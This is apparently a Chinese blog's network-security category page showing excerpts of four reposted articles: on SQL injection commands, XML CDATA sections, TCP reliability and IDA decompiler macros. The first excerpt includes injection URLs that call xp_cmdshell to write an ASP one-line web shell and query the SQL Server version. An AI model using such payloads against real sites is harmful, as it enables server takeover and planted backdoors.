网络安全
小小攻城师
这个作者很懒,什么都没留下…
展开
-
注入攻击命令大全
1、 用^转义字符来写ASP(一句话木马)文件的方法:? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^execute request^("l"^)^ >c:/mu.asp';-- ? echo ^ >c:/mu.asp2、 显示SQL系统版本: ? http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)转载 2011-04-16 10:13:00 · 7609 阅读 · 0 评论 -
<![CDATA]>初探
CDATA 内部的所有东西都会被解析器忽略。关于 CDATA 区段的注释:CDATA 区段不能包含字符串 "]]>",所以,CDATA 区段的嵌套是不被允许的。同时也需要确保在 "]]>" 字符串中没有空格或折行。为什么要使用CDATA: XHTML的第二个改变是使用CDATA段。XML中的CDATA段用于声明不应被解析为标签的文本(XHTML也转载 2013-12-25 22:56:25 · 992 阅读 · 0 评论 -
TCP详解
一、TCP协议1、TCP 通过以下方式提供可靠性: ◆ 应用程序分割为TCP认为最合适发送的数据块。由TCP传递给IP的信息单位叫做报文段。 ◆ 当TCP发出一个报文段后,它启动一个定时器,等待目的端确认收到这个报文段。如果不能记时收到一个确认,它 就重发这个报文段。 ◆ 当TCP收到发自TCP连接另一端的数据,它将发送一个确认。这个确认不是立即发送,通常延迟几分之一秒。转载 2014-08-09 15:59:52 · 1170 阅读 · 0 评论 -
IDA逆向常用宏定义
/* This file contains definitions used by the Hex-Rays decompiler output. It has type definitions and convenience macros to make the output more readable. Copyright (c) 2007-2011 Hex-Ray转载 2016-07-25 19:14:19 · 28414 阅读 · 5 评论